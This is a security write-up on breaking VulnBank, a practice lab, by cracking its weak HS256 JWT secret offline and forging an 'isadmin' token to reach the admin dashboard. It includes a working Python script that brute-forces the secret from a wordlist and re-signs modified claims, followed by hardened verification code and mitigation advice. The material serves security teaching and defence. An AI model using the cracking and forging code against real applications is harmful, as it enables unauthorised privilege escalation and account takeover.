Richard Ndung'u
JWT Hacking: Broken Access Control Exploit.

The cyber world

JSON Web Tokens (JWTs) are one of the most popular ways to implement authentication and authorization in web applications.

If they are not implemented securely they become a liability: an attacker who recovers a weak signing secret can forge tokens carrying any claims they like and use them to break into the application.

In this write-up, I exploited VulnBank's JWT and accessed the Admin Dashboard. This is a broken access control attack in which a weakly signed JWT is exploited.

JWT in a Nutshell

header.payload.signature

Each part is base64url-encoded JSON (the signature is raw bytes) and the three are joined with dots. The header and payload can be read by anyone holding the token; only the signature ties them to the issuer's key.

  • Header (metadata about the token, including the signing algorithm)

  • Payload (claims / user data)

  • Signature (computed over header.payload with the key; used to verify integrity)

Header (JSON)

{
"alg": "HS256",
"typ": "JWT"
}

Payload (JSON)

{
"sub": "1234567890",
"name": "Richard Ndung'u",
"role": "admin",
"iat": 1694010000,
"exp": 1694013600
}
The Attack In VulnBank

API documentation
Endpoint discovery in the API documentation revealed the admin endpoint that could be targeted.

https://vulnbank.org/api/docs/

Register endpoint
Registering as a user and using Burp Suite to intercept the traffic allowed me to capture the token.


JWT cracking
I used a JWT security checker to attack the JWT and get the secret key. Because HS256 uses a shared secret, this attack runs entirely offline: each guess costs one HMAC computation and never touches the server, so rate limiting and account lockouts never see it.


JWT modification
I changed the "isadmin" claim from "false" to "true", then generated a new JWT (re-signed with the recovered key) that I used to log in to the admin dashboard.


Admin dashboard
The modified JWT was accepted and used to log in to the admin dashboard.
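The structure described in "JWT in a Nutshell" and the crack-and-forge steps above, as one added example that is not part of the original post and not VulnBank's code. It is plain Python on the standard library: the captured token is rebuilt locally under an assumed weak secret, the wordlist and the claims are constructed for the demo, and `isadmin` is the claim the write-up flipped; VulnBank's real secret and the internals of the checker tool are not known from the page.

```python
import base64
import hashlib
import hmac
import json
from typing import Dict, List, Optional, Tuple

# Added example, not VulnBank's code or the tool used in the write-up.
# Everything here uses only the standard library. The secret, the wordlist
# and the claims are constructed for the demo; "isadmin" is the claim the
# write-up flipped.


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256_signature(signing_input: bytes, secret: bytes) -> str:
    # HS256 = HMAC-SHA256 over "header.payload", base64url-encoded
    return b64url_encode(hmac.new(secret, signing_input, hashlib.sha256).digest())


def encode_jwt(header: Dict, payload: Dict, secret: bytes) -> str:
    parts = [b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))
             for obj in (header, payload)]
    return ".".join(parts + [hs256_signature(".".join(parts).encode("ascii"), secret)])


def decode_jwt(token: str) -> Tuple[Dict, Dict, str]:
    # No key needed: header and payload are just base64url-encoded JSON,
    # which is why anyone holding a token can read every claim in it.
    header_b64, payload_b64, sig = token.split(".")
    return (json.loads(b64url_decode(header_b64)),
            json.loads(b64url_decode(payload_b64)), sig)


def verify_hs256(token: str, secret: bytes) -> bool:
    header_b64, payload_b64, sig = token.split(".")
    expected = hs256_signature(f"{header_b64}.{payload_b64}".encode("ascii"), secret)
    return hmac.compare_digest(expected, sig)


def crack_hs256_secret(token: str, wordlist: List[str]) -> Optional[str]:
    # Offline dictionary attack: one HMAC per guess and no traffic to the
    # server, so rate limiting and lockouts never see it.
    for guess in wordlist:
        if verify_hs256(token, guess.encode("utf-8")):
            return guess
    return None


def forge_token(token: str, secret: bytes, **changed_claims) -> str:
    # Keep the header and all other claims, override the chosen ones, re-sign
    header, payload, _ = decode_jwt(token)
    return encode_jwt(header, {**payload, **changed_claims}, secret)


# Constructed demo data: stands in for the token captured with Burp Suite
WEAK_SECRET = b"vulnbank123"
WORDLIST = ["password", "secret", "admin", "vulnbank", "vulnbank123", "letmein"]
CAPTURED_TOKEN = encode_jwt(
    {"alg": "HS256", "typ": "JWT"},
    {"sub": "42", "name": "Richard Ndung'u", "isadmin": False,
     "iat": 1694010000, "exp": 1694013600},
    WEAK_SECRET,
)


def run_attack(token: str = CAPTURED_TOKEN, wordlist: List[str] = WORDLIST) -> Optional[Dict]:
    # Recover the secret, flip isadmin, and return the claims the server would
    # now accept; None when the secret is not in the wordlist.
    secret = crack_hs256_secret(token, wordlist)
    if secret is None:
        return None
    forged = forge_token(token, secret.encode("utf-8"), isadmin=True)
    assert verify_hs256(forged, secret.encode("utf-8"))  # server-side check passes
    return decode_jwt(forged)[1]


if __name__ == "__main__":
    header, payload, _ = decode_jwt(CAPTURED_TOKEN)
    print("header :", header)
    print("payload:", payload)
    print("forged :", run_attack())
```

Running the script prints the decoded header and payload of the captured token and then the claims of the forged token with `isadmin` set to `true`. Two points worth noticing: decoding never needed the key, so the claim names were visible the moment the token was captured, and once the secret is recovered the attacker can mint tokens for any user until the secret is rotated, not just the one they registered.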


Broken Access Control
This attack falls under Broken Access Control, A01 in the OWASP Top 10 (2021).

According to OWASP (2021)

  • 94% of the applications in the dataset were tested for some form of broken access control, with an average incidence rate of 3.81%; the incidence rate, not the 94%, is the share of tested applications that actually had the weakness

  • OWASP counted 318,487 occurrences of CWEs mapped to broken access control, the highest of any category

Kaspersky study (2021-2023)

  • 70% of tested corporate web applications exhibited broken access control vulnerabilities. Of these, 37% were rated high-risk, 49% medium-risk, and 14% low-risk

Conclusion

This project demonstrates how easily a JWT can be forged when the signing secret is weak: nothing had to be taken from the server, because the secret was recoverable from a single captured token by guessing. Use a long, random secret (at least 256 bits for HS256) or an asymmetric algorithm such as RS256/ES256, pin the accepted algorithm on the server rather than trusting the token's "alg" header, and keep token lifetimes short. AppSec and DevSecOps engineers have the responsibility to test the JWTs their applications issue to reduce the risk of broken access control.
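The defensive side of the conclusion, as an added example that is not VulnBank's code: an issuer and verifier, again on the Python standard library only, that refuse the conditions the write-up exploited. The 32-byte minimum secret length, the 15-minute default lifetime and the claim names are assumptions made for this example.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Dict, Optional

# Added example, not VulnBank's code: issuing and verifying hardened against
# a guessable HS256 secret and against trusting whatever the token says.
# MIN_SECRET_BYTES and the claim names are assumptions for this example.

MIN_SECRET_BYTES = 32  # 256 bits, the HS256 hash output size


def is_acceptable_secret(candidate: bytes) -> bool:
    return len(candidate) >= MIN_SECRET_BYTES


def load_secret(candidate: bytes) -> bytes:
    # Fail closed at startup: a short, guessable secret never reaches production
    if not is_acceptable_secret(candidate):
        raise ValueError(
            f"JWT secret must be at least {MIN_SECRET_BYTES} bytes, got {len(candidate)}")
    return candidate


def generate_secret() -> bytes:
    # Random bytes from the OS CSPRNG; no wordlist will ever contain this
    return secrets.token_bytes(MIN_SECRET_BYTES)


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(claims: Dict, secret: bytes, now: Optional[int] = None, ttl: int = 900) -> str:
    # Short-lived token signed with a policy-checked secret
    load_secret(secret)
    now = int(time.time()) if now is None else now
    header = {"alg": "HS256", "typ": "JWT"}
    payload = {**claims, "iat": now, "exp": now + ttl}
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode("utf-8"))
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode("utf-8"))
    sig = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


def verify_token(token: str, secret: bytes, now: Optional[int] = None) -> Optional[Dict]:
    # Returns the claims only when every check passes, otherwise None.
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    try:
        header = json.loads(b64url_decode(h))
        payload = json.loads(b64url_decode(p))
        actual = b64url_decode(s)
    except ValueError:  # covers bad base64 and bad JSON
        return None
    if not isinstance(header, dict) or not isinstance(payload, dict):
        return None
    # Pin the algorithm on the server; the token must not get to choose it.
    # This also rejects "none" and any attempt to swap in another algorithm.
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, actual):
        return None
    now = int(time.time()) if now is None else now
    exp = payload.get("exp")
    if not isinstance(exp, int) or exp <= now:
        return None
    return payload


if __name__ == "__main__":
    key = generate_secret()
    token = issue_token({"sub": "42", "isadmin": False}, key)
    print("claims:", verify_token(token, key))
    print("weak secret accepted?", is_acceptable_secret(b"vulnbank123"))
```

The order of checks matters: the algorithm is fixed before any signature work, the signature is checked with a constant-time compare before any claim is read, and expiry is enforced last. A dictionary attack like the one in the write-up is pointless against a 32-byte random secret, and a token whose `isadmin` claim has been edited without re-signing never gets past the signature check.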
